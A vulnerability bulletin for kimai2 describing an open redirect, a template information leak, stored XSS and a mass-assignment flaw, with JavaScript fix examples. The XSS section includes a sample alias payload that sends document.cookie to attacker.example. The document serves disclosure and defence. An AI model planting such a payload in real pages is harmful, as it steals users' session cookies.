SB2026041478 - Multiple vulnerabilities in kimai2

Published: April 14, 2026 Updated: April 14, 2026

Security Bulletin ID: SB2026041478
Severity: Low
Patch available: Yes
Number of vulnerabilities: 4
Exploitation vector: Remote access
Highest impact: Data manipulation

Breakdown by Severity

Low: 4 (100%), Medium: 0, High: 0, Critical: 0

Description

This security bulletin contains information about 4 security vulnerabilities.


1) Open redirect (CVE-ID: N/A)

The vulnerability allows a remote attacker to redirect users to an attacker-controlled site.

The vulnerability exists due to URL redirection to an untrusted site in src/Saml/Security/SamlAuthenticationSuccessHandler.php, which uses the RelayState parameter received by the SAML assertion consumer service (ACS) handler as the post-login redirect target without validating it. A remote attacker can supply a malicious RelayState value to redirect users to an attacker-controlled site after they complete authentication.

SAML must be enabled, and exploitation is limited to IdP-initiated SSO flows where a malicious RelayState value is included. User interaction is required to complete SAML authentication.
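One way to validate RelayState before redirecting, shown here as an added JavaScript illustration rather than Kimai's PHP handler: only a relative path on the application's own origin is accepted, everything else falls back to a fixed target. The origin https://kimai.example.com, the function names and the fallback target are assumptions made for this example.

```javascript
// Added illustration, not Kimai's code: accept a SAML RelayState only if it
// resolves to a path on our own origin, otherwise redirect to a fixed default.
const APP_ORIGIN = "https://kimai.example.com"; // assumed deployment origin
const DEFAULT_TARGET = "/";                      // assumed fallback after login

// Returns the redirect target (path + query + fragment) to use after a
// successful SAML login; never an attacker-supplied host.
function safeRelayStateTarget(relayState, origin = APP_ORIGIN, fallback = DEFAULT_TARGET) {
  if (typeof relayState !== "string" || relayState === "" || relayState.length > 2048) {
    return fallback;
  }
  // Only a single leading "/" is allowed. This rejects absolute URLs
  // ("https://evil"), scheme-prefixed values ("javascript:..."),
  // protocol-relative ones ("//evil") and the backslash variant ("/\evil")
  // that browsers treat like a slash.
  if (!/^\/(?![\/\\])/.test(relayState)) {
    return fallback;
  }
  let url;
  try {
    url = new URL(relayState, origin);
  } catch {
    return fallback;
  }
  // The WHATWG parser strips tabs/newlines and folds backslashes, so the
  // origin is re-checked after parsing instead of trusting the raw string.
  if (url.origin !== origin) {
    return fallback;
  }
  // Dot-segment normalisation can still turn "/.//host" into "//host"; a
  // Location header starting with "//" is protocol-relative, so refuse it.
  if (url.pathname.startsWith("//")) {
    return fallback;
  }
  return url.pathname + url.search + url.hash;
}

// Where a success handler would use it (sketch): after the assertion has been
// validated, redirect to safeRelayStateTarget(request.body.RelayState).
```

The raw-string check and the post-parse origin check are both kept on purpose: the first documents the intended shape, the second catches the parser quirks (tab stripping, backslash folding, dot-segment collapsing) that turn a harmless-looking string into a cross-origin redirect.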


2) Improper access control (CVE-ID: N/A)

The vulnerability allows a remote user to disclose sensitive information.

The vulnerability exists because the Twig sandbox policy applied to user-controlled invoice templates does not restrict access to sensitive methods of the User object. A remote privileged user who can upload invoice templates can embed calls to those methods in a crafted template and disclose sensitive information when the template is rendered.

Only on-premise installations with template upload activated are affected, and user interaction is required because a user must generate an invoice using the malicious template.


3) Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CVE-ID: CVE-2026-40479)

The vulnerability allows a remote user to execute arbitrary script in another user's browser.

The vulnerability exists due to cross-site scripting in the team member widget when rendering user-controlled profile alias data into an HTML attribute via innerHTML. A remote user can inject a specially crafted profile alias to execute arbitrary script in another user's browser.

The injected payload is stored in the user alias field (a stored cross-site scripting issue); user interaction is required, and the script may execute in an administrator's browser session when the widget is displayed.
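The fix pattern for this class of bug, as an added JavaScript example that is not Kimai's widget code: alias text must never reach the page as markup, either by escaping it for the HTML context it lands in or, better, by going through the DOM API so it is only ever data. The render functions, the attribute inspector used to check the output, and the sample alias are all constructed for this illustration.

```javascript
// Added illustration, not Kimai's code. The widget in the advisory builds an
// HTML string containing a user-supplied alias inside an attribute and assigns
// it via innerHTML, so an alias such as  x" onmouseover="...  becomes live markup.

// Vulnerable pattern (kept only for contrast): alias lands in an attribute and
// in the text content unescaped.
function renderMemberUnsafe(member) {
  return `<span class="member" title="${member.alias}">${member.alias}</span>`;
}

// Escaper for HTML text and double-quoted attribute values: every character
// that can close an attribute, open a tag or start an entity becomes an entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Safe string rendering, if markup strings must be built at all.
function renderMemberSafe(member) {
  const alias = escapeHtml(member.alias);
  return `<span class="member" title="${alias}">${alias}</span>`;
}

// Preferred: build the node with the DOM API (browser only). The alias is set
// as an attribute value and a text node, neither of which is parsed as HTML.
function appendMember(container, member, doc = globalThis.document) {
  const span = doc.createElement("span");
  span.className = "member";
  span.setAttribute("title", member.alias);
  span.textContent = member.alias;
  container.appendChild(span);
  return span;
}

// Inspector used to show the difference: attribute names present in the
// opening tag. Any "on*" name here means the alias broke out of its attribute.
function attributeNames(html) {
  const openTag = html.slice(0, html.indexOf(">") + 1);
  return [...openTag.matchAll(/\s([a-z-]+)="[^"]*"/gi)].map((m) => m[1]);
}

// Constructed sample alias: a stored-XSS payload that exfiltrates cookies.
const ATTACKER_ALIAS = 'bob" onmouseover="fetch(\'//attacker.example/?c=\'+document.cookie)';
```

With the unsafe renderer the opening tag gains a third, attacker-chosen attribute (onmouseover); with the escaped renderer the quote is neutralised and the tag keeps exactly class and title. Escaping is context-specific: the function above is correct for text and double-quoted attributes, not for URLs, JavaScript strings or CSS.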


4) Improperly Controlled Modification of Dynamically-Determined Object Attributes (CVE-ID: CVE-2026-40486)

The vulnerability allows a remote user to modify restricted financial attributes on their profile.

The vulnerability exists due to improperly controlled modification of dynamically-determined object attributes in src/API/UserController.php::updateUserPreference when handling PATCH requests to /api/users/{id}/preferences. A remote user can send a specially crafted request to modify restricted financial attributes on their profile.

The standard GUI flow marks these preferences as disabled for users without the hourly-rate role, but the API endpoint ignores that flag and persists the changes.
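An added JavaScript illustration of the server-side check the endpoint is missing, not Kimai's PHP controller: each preference key carries a policy, the handler applies only the keys the caller is allowed to set, and a forbidden or unknown key fails the request instead of being silently persisted. The preference keys, the role name ROLE_SET_HOURLY_RATE and the sample user are assumptions made for this example.

```javascript
// Added illustration, not Kimai's code: a per-key policy for preference
// updates, enforced on the API path independently of what the GUI disables.
const PREFERENCE_POLICY = new Map([
  ["timezone", { requiredRole: null }],
  ["language", { requiredRole: null }],
  ["hourly_rate", { requiredRole: "ROLE_SET_HOURLY_RATE" }],   // assumed role name
  ["internal_rate", { requiredRole: "ROLE_SET_HOURLY_RATE" }], // assumed key
]);

class PreferenceError extends Error {
  constructor(message, status) {
    super(message);
    this.status = status;
  }
}

// Returns a new user object with the patch applied. Throws PreferenceError
// (400 for an unknown key, 403 for a key the actor may not set) rather than
// dropping the key, so a client sees that the write was refused.
function applyPreferencePatch(user, patch, actorRoles) {
  if (patch === null || typeof patch !== "object" || Array.isArray(patch)) {
    throw new PreferenceError("body must be a JSON object", 400);
  }
  const roles = new Set(actorRoles);
  const updated = { ...user.preferences };
  // Object.keys skips inherited names, and a Map lookup does not resolve
  // "constructor" or "__proto__" the way a plain-object allowlist would.
  for (const key of Object.keys(patch)) {
    const policy = PREFERENCE_POLICY.get(key);
    if (policy === undefined) {
      throw new PreferenceError(`unknown preference: ${key}`, 400);
    }
    if (policy.requiredRole !== null && !roles.has(policy.requiredRole)) {
      throw new PreferenceError(`not allowed to set ${key}`, 403);
    }
    updated[key] = patch[key];
  }
  return { ...user, preferences: updated };
}

// Minimal handler in the shape of PATCH /api/users/{id}/preferences.
function handlePatchPreferences(actor, targetUser, body) {
  try {
    const saved = applyPreferencePatch(targetUser, body, actor.roles);
    return { status: 200, body: saved.preferences };
  } catch (e) {
    if (e instanceof PreferenceError) {
      return { status: e.status, body: { error: e.message } };
    }
    throw e;
  }
}

// Constructed sample: a regular user attempting to raise their own rate.
const SAMPLE_USER = { id: 7, preferences: { timezone: "UTC", hourly_rate: 50 } };
```

The point of the design is that authorisation lives next to the data model, not in the form layer: a disabled field in the GUI is a usability hint, and every write path (form, API, import) has to go through the same policy.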


Remediation

Install the update from the vendor's website.